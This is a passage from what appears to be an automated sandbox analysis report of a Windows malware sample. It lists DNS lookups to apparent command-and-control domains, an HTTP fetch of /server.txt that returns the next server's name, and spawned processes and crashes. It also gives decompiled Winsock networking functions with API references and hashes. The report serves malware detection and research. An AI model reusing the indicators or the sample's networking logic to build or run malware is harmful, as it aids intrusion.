May 22, 2022 18:15:03.152307034 CEST	52985	53	192.168.2.3	8.8.8.8
May 22, 2022 18:15:03.170161963 CEST	53	52985	8.8.8.8	192.168.2.3
May 22, 2022 18:15:24.261394024 CEST	64941	53	192.168.2.3	8.8.8.8
May 22, 2022 18:15:24.379008055 CEST	53	64941	8.8.8.8	192.168.2.3
May 22, 2022 18:15:45.466348886 CEST	53524	53	192.168.2.3	8.8.8.8
May 22, 2022 18:15:45.483863115 CEST	53	53524	8.8.8.8	192.168.2.3
May 22, 2022 18:16:06.566169977 CEST	61555	53	192.168.2.3	8.8.8.8
May 22, 2022 18:16:06.732749939 CEST	53	61555	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 22, 2022 18:14:13.703377962 CEST	192.168.2.3	8.8.8.8	0xa260	Standard query (0)	blackhk1.beget.tech	A (IP address)	IN (0x0001)
May 22, 2022 18:14:20.395705938 CEST	192.168.2.3	8.8.8.8	0x32ac	Standard query (0)	gumtifire.com	A (IP address)	IN (0x0001)
May 22, 2022 18:14:41.931665897 CEST	192.168.2.3	8.8.8.8	0xbe49	Standard query (0)	gumtifire.com	A (IP address)	IN (0x0001)
May 22, 2022 18:15:03.152307034 CEST	192.168.2.3	8.8.8.8	0x81a4	Standard query (0)	gumtifire.com	A (IP address)	IN (0x0001)
May 22, 2022 18:15:24.261394024 CEST	192.168.2.3	8.8.8.8	0x3eea	Standard query (0)	gumtifire.com	A (IP address)	IN (0x0001)
May 22, 2022 18:15:45.466348886 CEST	192.168.2.3	8.8.8.8	0x932d	Standard query (0)	gumtifire.com	A (IP address)	IN (0x0001)
May 22, 2022 18:16:06.566169977 CEST	192.168.2.3	8.8.8.8	0xbe03	Standard query (0)	gumtifire.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
May 22, 2022 18:14:13.723165035 CEST	8.8.8.8	192.168.2.3	0xa260	No error (0)	blackhk1.beget.tech	5.101.153.227	A (IP address)	IN (0x0001)
May 22, 2022 18:14:20.415194035 CEST	8.8.8.8	192.168.2.3	0x32ac	No error (0)	gumtifire.com	107.161.23.150	A (IP address)	IN (0x0001)
May 22, 2022 18:14:41.951348066 CEST	8.8.8.8	192.168.2.3	0xbe49	No error (0)	gumtifire.com	107.161.23.150	A (IP address)	IN (0x0001)
May 22, 2022 18:15:03.170161963 CEST	8.8.8.8	192.168.2.3	0x81a4	No error (0)	gumtifire.com	107.161.23.150	A (IP address)	IN (0x0001)
May 22, 2022 18:15:24.379008055 CEST	8.8.8.8	192.168.2.3	0x3eea	No error (0)	gumtifire.com	107.161.23.150	A (IP address)	IN (0x0001)
May 22, 2022 18:15:45.483863115 CEST	8.8.8.8	192.168.2.3	0x932d	No error (0)	gumtifire.com	107.161.23.150	A (IP address)	IN (0x0001)
May 22, 2022 18:16:06.732749939 CEST	8.8.8.8	192.168.2.3	0xbe03	No error (0)	gumtifire.com	107.161.23.150	A (IP address)	IN (0x0001)

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49751	5.101.153.227	80	C:\Users\user\Desktop\xw0K5Lahxz.exe

Timestamp	kBytes transferred	Direction	Data
May 22, 2022 18:14:20.213428974 CEST	1055	OUT	GET Data Raw: Data Ascii:
May 22, 2022 18:14:20.276971102 CEST	1056	OUT	Data Raw: 2f 73 65 72 76 65 72 2e 74 78 74 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 62 6c 61 63 6b 68 6b 31 2e 62 65 67 65 74 2e 74 65 63 68 0d 0a 2a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 2a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d Data Ascii: /server.txt HTTP/1.0Host: blackhk1.beget.techAccept: /**Connection: closeUser-Agent: Firefox-3.0
May 22, 2022 18:14:20.340595961 CEST	1056	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 22 May 2022 16:14:20 GMT Content-Type: text/plain Content-Length: 13 Last-Modified: Sun, 22 May 2022 13:44:57 GMT Connection: close ETag: "628a3e59-d" Expires: Sun, 29 May 2022 16:14:20 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes Data Raw: 67 75 6d 74 69 66 69 72 65 2e 63 6f 6d Data Ascii: gumtifire.com

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: xw0K5Lahxz.exePID: 7032, Parent PID: 3004

General

Target ID:	0
Start time:	18:14:06
Start date:	22/05/2022
Path:	C:\Users\user\Desktop\xw0K5Lahxz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\xw0K5Lahxz.exe"
Imagebase:	0x400000
File size:	311808 bytes
MD5 hash:	7915148540E7809FE683781541C1D4ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7048, Parent PID: 7032

General

Target ID:	1
Start time:	18:14:07
Start date:	22/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 7156, Parent PID: 7032

General

Target ID:	3
Start time:	18:14:11
Start date:	22/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 452
Imagebase:	0x200000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6116, Parent PID: 7032

General

Target ID:	7
Start time:	18:14:14
Start date:	22/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 468
Imagebase:	0x200000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6408, Parent PID: 7032

General

Target ID:	10
Start time:	18:14:18
Start date:	22/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 548
Imagebase:	0x200000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 628, Parent PID: 7032

General

Target ID:	12
Start time:	18:14:24
Start date:	22/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 568
Imagebase:	0x200000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: xw0K5Lahxz.exePID: 7032, Parent PID: 3004COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	37%
Signature Coverage:	28.3%
Total number of Nodes:	873
Total number of Limit Nodes:	5

Executed Functions

Function 00404EB0 Relevance: 24.4, APIs: 16, Instructions: 404
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 19%

			E00404EB0(struct _CRITICAL_SECTION __ecx) {
				intOrPtr _v8;
				long _v16;
				char _v24;
				signed int _v32;
				struct _CRITICAL_SECTION* _v36;
				long _v40;
				long _v44;
				char _v48;
				long _v52;
				long _v56;
				char _v60;
				char _v64;
				char _v76;
				char _v80;
				char _v81;
				struct _OVERLAPPED* _v88;
				struct _CRITICAL_SECTION _v92;
				struct _CRITICAL_SECTION* _v96;
				void* _v100;
				struct _CRITICAL_SECTION* _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t178;
				signed int _t179;
				intOrPtr _t182;
				intOrPtr _t183;
				struct _CRITICAL_SECTION* _t184;
				struct _CRITICAL_SECTION* _t185;
				struct _CRITICAL_SECTION _t187;
				void* _t188;
				intOrPtr _t189;
				struct _OVERLAPPED* _t195;
				struct _CRITICAL_SECTION* _t199;
				intOrPtr _t207;
				int _t209;
				struct _OVERLAPPED* _t212;
				intOrPtr _t216;
				intOrPtr _t217;
				struct _CRITICAL_SECTION** _t219;
				intOrPtr _t220;
				intOrPtr _t221;
				intOrPtr _t222;
				struct _CRITICAL_SECTION _t224;
				struct _CRITICAL_SECTION _t227;
				char* _t230;
				intOrPtr _t231;
				struct _CRITICAL_SECTION* _t235;
				intOrPtr _t239;
				intOrPtr _t240;
				void* _t245;
				signed int _t251;
				struct _OVERLAPPED* _t252;
				struct _OVERLAPPED* _t262;
				struct _OVERLAPPED* _t266;
				struct _OVERLAPPED* _t271;
				intOrPtr _t276;
				struct _CRITICAL_SECTION* _t278;
				struct _OVERLAPPED* _t280;
				void* _t283;
				struct _CRITICAL_SECTION _t287;
				struct _CRITICAL_SECTION* _t288;
				intOrPtr _t291;
				void* _t292;
				struct _CRITICAL_SECTION _t293;
				intOrPtr _t294;
				intOrPtr* _t296;
				struct _CRITICAL_SECTION _t297;
				void* _t305;

				_t245 = _t305;
				_v8 =  *((intOrPtr*)(_t245 + 4));
				_t303 = (_t305 - 0x00000008 & 0xfffffff8) + 4;
				_push(0xffffffff);
				_push(0x413efd);
				_push( *[fs:0x0]);
				_push(_t245);
				_t178 =  *0x41b014; // 0x149e0abf
				_t179 = _t178 ^ (_t305 - 0x00000008 & 0xfffffff8) + 0x00000004;
				_v32 = _t179;
				_push(_t179);
				 *[fs:0x0] =  &_v24;
				_t287 = __ecx;
				_v92 = __ecx;
				_t280 =  *(_t245 + 0x1c);
				_t278 =  *(_t245 + 8);
				_v100 =  *((intOrPtr*)(_t245 + 0x14));
				_t182 =  *((intOrPtr*)(_t245 + 0xc));
				_v88 = _t280;
				_v96 = _t278;
				if(_t182 == 2 || _t182 == 0x17) {
					_t183 =  *((intOrPtr*)(_t245 + 0x10));
					if(_t183 == 1 || _t183 == 5) {
						_t184 = 0;
						asm("lock cmpxchg [edi], ecx");
						_t280 = _v88;
						_v80 = 0;
						if(0 == 0) {
							_v64 = 0x25a207b9;
							_v60 = 0x4660ddf3;
							_v56 = 0xe576e98e;
							_v52 = 0x3e06748c;
							_v44 = 0;
							__imp__WSAIoctl( *_t278, 0xc8000006,  &_v64, 0x10,  &_v80, 4,  &_v44, 0, 0);
							_t276 =  !=  ? _t287 : _v80;
							_v80 = _t276;
							 *((intOrPtr*)(_t287 + 0xc)) = _t276;
							_t184 = _v80;
							_t278 = _v96;
						}
						_t185 =  ==  ? 0 : _t184;
						_v36 = _t185;
						if(_t185 == 0) {
							goto L22;
						}
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x40], xmm0");
						_v76 =  *((intOrPtr*)(_t245 + 0xc));
						_t227 =  *_t278;
						asm("movq [ebp-0x30], xmm0");
						_v52 = 0;
						_v44 = _t227;
						if(_t227 != 0xffffffff) {
							__imp__#112(0);
							_t229 =  ==  ? 0x10 : 0x1c;
							_t230 =  &_v76;
							__imp__#2(_v44, _t230,  ==  ? 0x10 : 0x1c); // executed
							_t231 = E00412970();
							__imp__#111();
							_t271 = _v88;
							 *((intOrPtr*)(_t271 + 0x20)) = _t231;
							 *((intOrPtr*)(_t271 + 0x24)) = _t231;
							if(_t230 != 0) {
								_t280 = _t271;
							} else {
								_t239 = E00412970();
								_t280 = _v88;
								 *(_t280 + 0x20) = 0;
								 *((intOrPtr*)(_t280 + 0x24)) = _t239;
							}
							_t287 = _v92;
						} else {
							_t240 = E00412970();
							 *(_t280 + 0x20) = 0x2719;
							 *((intOrPtr*)(_t280 + 0x24)) = _t240;
						}
						if( *(_t280 + 0x20) == 0 ||  *((intOrPtr*)(_t280 + 0x24)) == E00412970() &&  *(_t280 + 0x20) == 0x2726) {
							 *((char*)(_t280 + 0x34)) = 1;
							asm("lock inc dword [eax]");
							_t235 = _v36( *_v96, _v100,  *((intOrPtr*)(_t245 + 0x18)), 0, 0, 0, _t280);
							__imp__#111();
							_v36 = _t235;
							if(_t235 != 0 || _t235 == 0x3e5) {
								_t278 = 1;
								_t192 = 0;
								_t291 =  *((intOrPtr*)(_v92 + 4));
								asm("lock cmpxchg [ecx], edx");
								if(0 != 1) {
									goto L62;
								}
								_push(_t280);
								_push(2);
							} else {
								_t291 =  *((intOrPtr*)(_v92 + 4));
								 *(_t280 + 0x1c) = 1;
								_t280->Internal = E00412970();
								_push(_t280);
								_t280->Offset = _v36;
								_t280->OffsetHigh = 0;
								_push(2);
							}
							goto L56;
						} else {
							_t291 =  *((intOrPtr*)(_t287 + 4));
							goto L55;
						}
					} else {
						goto L22;
					}
				} else {
					L22:
					_t278 = _t287 + 8;
					asm("lock cmpxchg [edx], ecx");
					_v92 = 0;
					if(0 == 0) {
						_v36 = 0;
						_v40 = 0x41d308;
						_t224 = E00401FB0( *((intOrPtr*)( *_t287 + 4)),  &_v40, E00410030);
						_v92 = _t224;
						 *(_t287 + 8) = _t224;
					}
					_t288 = _v96;
					_t251 = __imp__#112;
					if(( *(_t288 + 4) & 0x00000003) != 0) {
						L29:
						_t187 =  *_t288;
						_v36 = _t187;
						if(_t187 != 0xffffffff) {
							_t188 =  *_t251(0);
							__imp__#4(_v36, _v100,  *((intOrPtr*)(_t245 + 0x18)));
							_t189 = E00412970();
							__imp__#111();
							_t252 = _v88;
							 *((intOrPtr*)(_t252 + 0x20)) = _t189;
							 *((intOrPtr*)(_t252 + 0x24)) = _t189;
							if(_t188 != 0) {
								_t288 = _v96;
								_t280 = _t252;
								L34:
								if( *((intOrPtr*)(_t280 + 0x24)) != E00412970() ||  *(_t280 + 0x20) != 0x2734) {
									if( *((intOrPtr*)(_t280 + 0x24)) != E00412970() ||  *(_t280 + 0x20) != 0x2733) {
										goto L54;
									} else {
										goto L38;
									}
								} else {
									L38:
									 *((intOrPtr*)(_t280 + 0x24)) = E00412970();
									 *(_t280 + 0x20) = 0;
									_t293 = _v92;
									_v44 =  *_t288;
									_t199 = _t293 + 0x18;
									_v36 = _t199;
									_v104 = _t199;
									EnterCriticalSection(_t199);
									_v81 = 1;
									_v100 = 1;
									_v16 = 0;
									if( *((char*)(_t293 + 0xd8)) == 0) {
										_v40 = 0;
										_v36 = 0;
										_v60 = _v44;
										_v56 = 0;
										_v52 = 0;
										_v16 = 2;
										E0040CDC0(_t293 + 0x8c,  &_v48,  &_v60);
										E0040C170( &_v56);
										E0040C170( &_v40);
										_t207 = _v48;
										 *(_t280 + 0x14) = 0;
										_t262 =  *(_t207 + 0x10);
										if(_t262 == 0) {
											 *(_t207 + 0xc) = _t280;
										} else {
											 *(_t262 + 0x14) = _t280;
										}
										 *(_t207 + 0x10) = _t280;
										_t192 =  *((intOrPtr*)(_t293 + 0x14)) + 0x18;
										asm("lock inc dword [eax]");
										if(_v44 != 0) {
											_t192 = E00403B30(_t245, _t293 + 0x30, _t278, _t280);
										}
										if(_v81 == 0) {
											goto L62;
										} else {
											_t192 = _t293 + 0x18;
											goto L61;
										}
									}
									_t294 =  *((intOrPtr*)(_t293 + 0x14));
									asm("lock inc dword [esi+0x18]");
									 *(_t280 + 0x1c) = 1;
									_t209 = PostQueuedCompletionStatus( *(_t294 + 0x14), 0, 0, _t280);
									_v100 = LeaveCriticalSection;
									if(_t209 != 0) {
										_t192 = _v36;
										LeaveCriticalSection(_v36);
									} else {
										_t126 = _t294 + 0x38; // 0x38
										EnterCriticalSection(_t126);
										 *(_t280 + 0x14) = 0;
										_t212 =  *(_t294 + 0x58);
										if(_t212 == 0) {
											 *(_t294 + 0x54) = _t280;
										} else {
											 *(_t212 + 0x14) = _t280;
										}
										 *(_t294 + 0x58) = _t280;
										_t132 = _t294 + 0x34; // 0x34
										 *_t132 = 1;
										_t134 = _t294 + 0x38; // 0x38
										_t296 = _v100;
										_t192 =  *_t296(_t134);
										if(_v81 != 0) {
											_t192 =  *_t296(_v36);
										}
									}
									goto L62;
								}
							}
							_t216 = E00412970();
							_t280 = _v88;
							 *(_t280 + 0x20) = 0;
							 *((intOrPtr*)(_t280 + 0x24)) = _t216;
							goto L54;
						}
						_t217 = E00412970();
						 *(_t280 + 0x20) = 0x2719;
						 *((intOrPtr*)(_t280 + 0x24)) = _t217;
						goto L34;
					} else {
						_t297 =  *_t288;
						if(_t297 != 0xffffffff) {
							 *_t251(0);
							_t219 =  &_v36;
							_v36 = 1;
							__imp__#10(_t297, 0x8004667e, _t219);
							_t220 = E00412970();
							__imp__#111();
							_t266 = _v88;
							 *((intOrPtr*)(_t266 + 0x20)) = _t220;
							 *((intOrPtr*)(_t266 + 0x24)) = _t220;
							if(_t219 < 0) {
								_t280 = _t266;
								L54:
								_t291 =  *((intOrPtr*)(_v92 + 0x14));
								L55:
								asm("lock inc dword [esi+0x18]");
								_push(_t280);
								 *(_t280 + 0x1c) = 1;
								_push(0);
								L56:
								if(PostQueuedCompletionStatus( *(_t291 + 0x14), 0, ??, ??) != 0) {
									L62:
									 *[fs:0x0] = _v24;
									_pop(_t283);
									_pop(_t292);
									return E00412A1E(_t192, _t245, _v32 ^ _t303, _t278, _t283, _t292);
								}
								_t166 = _t291 + 0x38; // 0x38
								EnterCriticalSection(_t166);
								 *(_t280 + 0x14) = 0;
								_t195 =  *(_t291 + 0x58);
								if(_t195 == 0) {
									 *(_t291 + 0x54) = _t280;
								} else {
									 *(_t195 + 0x14) = _t280;
								}
								_t171 = _t291 + 0x34; // 0x34
								 *(_t291 + 0x58) = _t280;
								 *_t171 = 1;
								_t174 = _t291 + 0x38; // 0x38
								_t192 = _t174;
								L61:
								LeaveCriticalSection(_t192);
								goto L62;
							}
							_t221 = E00412970();
							_t280 = _v88;
							_t288 = _v96;
							_t251 = __imp__#112;
							 *(_t280 + 0x20) = 0;
							 *((intOrPtr*)(_t280 + 0x24)) = _t221;
							 *(_t288 + 4) =  *(_t288 + 4) | 0x00000002;
							goto L29;
						}
						_t222 = E00412970();
						 *(_t280 + 0x20) = 0x2719;
						 *((intOrPtr*)(_t280 + 0x24)) = _t222;
						goto L54;
					}
				}
			}

0x00404eb1
0x00404ec0
0x00404ec4
0x00404ec6
0x00404ec8
0x00404ed3
0x00404ed4
0x00404ed8
0x00404edd
0x00404edf
0x00404ee4
0x00404ee8
0x00404eee
0x00404ef0
0x00404ef6
0x00404ef9
0x00404efc
0x00404eff
0x00404f02
0x00404f05
0x00404f0b
0x00404f16
0x00404f1c
0x00404f2c
0x00404f2e
0x00404f32
0x00404f35
0x00404f3a
0x00404f43
0x00404f50
0x00404f5d
0x00404f6c
0x00404f73
0x00404f7a
0x00404f88
0x00404f8b
0x00404f8e
0x00404f90
0x00404f93
0x00404f93
0x00404f9a
0x00404f9d
0x00404fa2
0x00000000
0x00000000
0x00404fab
0x00404fae
0x00404fb2
0x00404fb6
0x00404fb8
0x00404fbd
0x00404fc0
0x00404fc6
0x00404fdb
0x00404fef
0x00404ff3
0x00404ffa
0x00405002
0x00405009
0x0040500f
0x00405012
0x00405015
0x0040501a
0x00405030
0x0040501c
0x0040501c
0x00405021
0x00405024
0x0040502b
0x0040502b
0x00405032
0x00404fc8
0x00404fc8
0x00404fcd
0x00404fd4
0x00404fd4
0x00405039
0x00405056
0x00405060
0x00405075
0x0040507a
0x00405080
0x00405085
0x004050ba
0x004050bf
0x004050c1
0x004050c7
0x004050ce
0x00000000
0x00000000
0x004050d4
0x004050d5
0x0040508e
0x00405091
0x00405094
0x004050a0
0x004050a5
0x004050a6
0x004050a9
0x004050b0
0x004050b0
0x00000000
0x0040504e
0x0040504e
0x00000000
0x0040504e
0x00000000
0x00000000
0x00000000
0x004050dc
0x004050dc
0x004050dc
0x004050e3
0x004050e9
0x004050ee
0x004050f2
0x00405101
0x00405108
0x0040510d
0x00405113
0x00405113
0x00405115
0x00405118
0x00405122
0x00405199
0x00405199
0x0040519b
0x004051a1
0x004051b6
0x004051c1
0x004051c9
0x004051d0
0x004051d6
0x004051d9
0x004051dc
0x004051e1
0x004051fa
0x004051fd
0x004051ff
0x00405207
0x0040521a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040522d
0x0040522d
0x00405232
0x00405235
0x0040523e
0x00405241
0x00405244
0x00405248
0x0040524b
0x0040524e
0x00405256
0x00405259
0x0040525c
0x0040526a
0x004052f0
0x004052f7
0x00405301
0x00405304
0x0040530b
0x00405315
0x00405324
0x0040532c
0x00405334
0x00405339
0x0040533c
0x00405343
0x00405348
0x0040534f
0x0040534a
0x0040534a
0x0040534a
0x00405352
0x00405358
0x0040535b
0x00405362
0x00405367
0x00405367
0x00405370
0x00000000
0x00405372
0x00405372
0x00000000
0x00405372
0x00405370
0x00405270
0x00405273
0x0040527c
0x00405286
0x00405293
0x00405296
0x004052e5
0x004052e9
0x00405298
0x00405298
0x0040529c
0x004052a2
0x004052a9
0x004052ae
0x004052b5
0x004052b0
0x004052b0
0x004052b0
0x004052b8
0x004052bb
0x004052c3
0x004052c5
0x004052c8
0x004052cc
0x004052d2
0x004052dc
0x004052dc
0x004052d2
0x00000000
0x00405296
0x00405207
0x004051e3
0x004051e8
0x004051eb
0x004051f2
0x00000000
0x004051f2
0x004051a3
0x004051a8
0x004051af
0x00000000
0x00405124
0x00405124
0x00405129
0x00405141
0x00405143
0x00405146
0x00405154
0x0040515c
0x00405163
0x00405169
0x0040516c
0x0040516f
0x00405174
0x00405377
0x00405379
0x0040537c
0x0040537f
0x0040537f
0x00405383
0x00405384
0x0040538b
0x0040538d
0x0040539a
0x004053d3
0x004053d6
0x004053de
0x004053df
0x004053f0
0x004053f0
0x0040539c
0x004053a0
0x004053a6
0x004053ad
0x004053b2
0x004053b9
0x004053b4
0x004053b4
0x004053b4
0x004053bc
0x004053bf
0x004053c7
0x004053c9
0x004053c9
0x004053cc
0x004053cd
0x00000000
0x004053cd
0x0040517a
0x0040517f
0x00405182
0x00405185
0x0040518b
0x00405192
0x00405195
0x00000000
0x00405195
0x0040512b
0x00405130
0x00405137
0x00000000
0x00405137
0x00405122

APIs

WSAIoctl.WS2_32(00000010,C8000006,25A207B9,00000010,?,00000004,?,00000000,00000000), ref: 00404F7A
WSASetLastError.WS2_32(00000000,149E0ABF,00000000), ref: 00404FDB
bind.WS2_32(?,?,0000001C), ref: 00404FFA
WSAGetLastError.WS2_32 ref: 00405009
WSAGetLastError.WS2_32 ref: 0040507A
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,?), ref: 00405392
EnterCriticalSection.KERNEL32(00000038), ref: 004053A0
LeaveCriticalSection.KERNEL32(00000038), ref: 004053CD

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: ErrorLast$CriticalSection$CompletionEnterIoctlLeavePostQueuedStatusbind
String ID:
API String ID: 2340076555-0
Opcode ID: 92a6a93285532338d75ef007855a7bd3b233e121350df6d3115360f2691e94b7
Instruction ID: b939037bba1c24809284077cb8a9c9294a8d1efb243dd1bfffddfb52fce176ee
Opcode Fuzzy Hash: 92a6a93285532338d75ef007855a7bd3b233e121350df6d3115360f2691e94b7
Instruction Fuzzy Hash: B3024771900A05DFDB25CFA4C944B9EBBF4FF48314F10462AE846AB790D7B8A845CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404CC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00404CC0(struct _CRITICAL_SECTION* __ecx, intOrPtr* _a4, struct _CRITICAL_SECTION* _a8, intOrPtr _a12, char _a20, struct _OVERLAPPED* _a24) {
				signed int _v8;
				long _v12;
				long _v16;
				struct _CRITICAL_SECTION* _v20;
				intOrPtr _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				intOrPtr _t65;
				struct _OVERLAPPED* _t70;
				struct _CRITICAL_SECTION** _t71;
				long _t74;
				struct _OVERLAPPED* _t75;
				long _t76;
				struct _OVERLAPPED* _t77;
				struct _CRITICAL_SECTION* _t78;
				intOrPtr _t79;
				long _t80;
				intOrPtr* _t82;
				struct _CRITICAL_SECTION* _t92;
				struct _OVERLAPPED* _t94;
				void* _t95;
				struct _CRITICAL_SECTION* _t96;
				signed int _t98;

				_t61 =  *0x41b014; // 0x149e0abf
				_v8 = _t61 ^ _t98;
				_t92 = _a8;
				_t96 = __ecx;
				_t82 = _a4;
				_t94 = _a24;
				_v20 = __ecx;
				asm("lock inc dword [eax]");
				if(_a20 == 0) {
					_t65 =  *_t82;
					if(_t65 != 0xffffffff) {
						_v12 = 0;
						_v16 = 0;
						__imp__WSARecv(_t65, _t92, _a12,  &_v12,  &_v16, _t94, 0); // executed
						_v24 = _t65;
						__imp__#111();
						_t79 = _t65;
						if(_t79 != 0x40) {
							_t80 =  ==  ? 0x274d : _t79;
						} else {
							_t80 = 0x2746;
						}
						if(_v24 == 0 || _t80 == 0x3e5) {
							_t97 =  *(_t96 + 4);
							_t78 = 1;
							_t67 = 0;
							_t92 = 1;
							asm("lock cmpxchg [ecx], edx");
							if(0 == 1) {
								_t67 = PostQueuedCompletionStatus( *(_t97 + 0x14), 0, 2, _t94);
								if(0 == 0) {
									EnterCriticalSection(_t97 + 0x38);
									 *(_t94 + 0x14) = 0;
									_t70 =  *(_t97 + 0x58);
									if(_t70 == 0) {
										 *(_t97 + 0x54) = _t94;
									} else {
										 *(_t70 + 0x14) = _t94;
									}
									 *(_t97 + 0x58) = _t94;
									_t71 = _t97 + 0x34;
									_t58 = _t78;
									_t78 =  *_t71;
									 *_t71 = _t58;
									_t67 = _t97 + 0x38;
									LeaveCriticalSection(_t97 + 0x38);
									goto L25;
								}
							}
						} else {
							_t97 = _v12;
							_v20 =  *((intOrPtr*)(_v20 + 4));
							 *(_t94 + 0x1c) = 1;
							_t74 = E00412970();
							_t94->Offset = _t80;
							_t78 = _v20;
							_t94->Internal = _t74;
							_t94->OffsetHigh = _v12;
							if(PostQueuedCompletionStatus( *(_t78 + 0x14), 0, 2, _t94) == 0) {
								_t97 = _t78 + 0x38;
								EnterCriticalSection(_t97);
								 *(_t94 + 0x14) = 0;
								_t75 =  *(_t78 + 0x58);
								if(_t75 == 0) {
									 *(_t78 + 0x54) = _t94;
								} else {
									 *(_t75 + 0x14) = _t94;
								}
								 *(_t78 + 0x58) = _t94;
								_t67 = _t78 + 0x34;
								 *(_t78 + 0x34) = 1;
								LeaveCriticalSection(_t97);
								goto L25;
							}
						}
					} else {
						_t97 =  *(__ecx + 4);
						 *(_t94 + 0x1c) = 1;
						_t76 = E00412970();
						_t94->Offset = 0x2719;
						goto L2;
					}
				} else {
					_t97 =  *(__ecx + 4);
					 *(_t94 + 0x1c) = 1;
					_t76 = E00412970();
					_t94->Offset = 0;
					L2:
					_t94->Internal = _t76;
					_t94->OffsetHigh = 0;
					if(PostQueuedCompletionStatus( *(_t97 + 0x14), 0, 2, _t94) == 0) {
						_t78 = _t97 + 0x38;
						EnterCriticalSection(_t78);
						 *(_t94 + 0x14) = 0;
						_t77 =  *(_t97 + 0x58);
						if(_t77 == 0) {
							 *(_t97 + 0x54) = _t94;
						} else {
							 *(_t77 + 0x14) = _t94;
						}
						 *(_t97 + 0x58) = _t94;
						_t67 = _t97 + 0x34;
						 *(_t97 + 0x34) = 1;
						LeaveCriticalSection(_t78);
						L25:
					}
				}
				_pop(_t95);
				return E00412A1E(_t67, _t78, _v8 ^ _t98, _t92, _t95, _t97);
			}

0x00404cc6
0x00404ccd
0x00404cd0
0x00404cd5
0x00404cd7
0x00404cdb
0x00404cde
0x00404ce7
0x00404cee
0x00404d58
0x00404d5d
0x00404d7d
0x00404d88
0x00404d95
0x00404d9b
0x00404d9e
0x00404da4
0x00404da9
0x00404dbd
0x00404dab
0x00404dab
0x00404dab
0x00404dc4
0x00404e37
0x00404e3d
0x00404e42
0x00404e44
0x00404e46
0x00404e4c
0x00404e56
0x00404e5e
0x00404e64
0x00404e6a
0x00404e71
0x00404e76
0x00404e7d
0x00404e78
0x00404e78
0x00404e78
0x00404e80
0x00404e83
0x00404e86
0x00404e86
0x00404e86
0x00404e88
0x00404e8c
0x00000000
0x00404e8c
0x00404e5e
0x00404dce
0x00404dd1
0x00404dd7
0x00404dda
0x00404de1
0x00404de7
0x00404dea
0x00404df1
0x00404df3
0x00404e01
0x00404e07
0x00404e0b
0x00404e11
0x00404e18
0x00404e1d
0x00404e24
0x00404e1f
0x00404e1f
0x00404e1f
0x00404e27
0x00404e2a
0x00404e32
0x00404e8c
0x00000000
0x00404e8c
0x00404e01
0x00404d5f
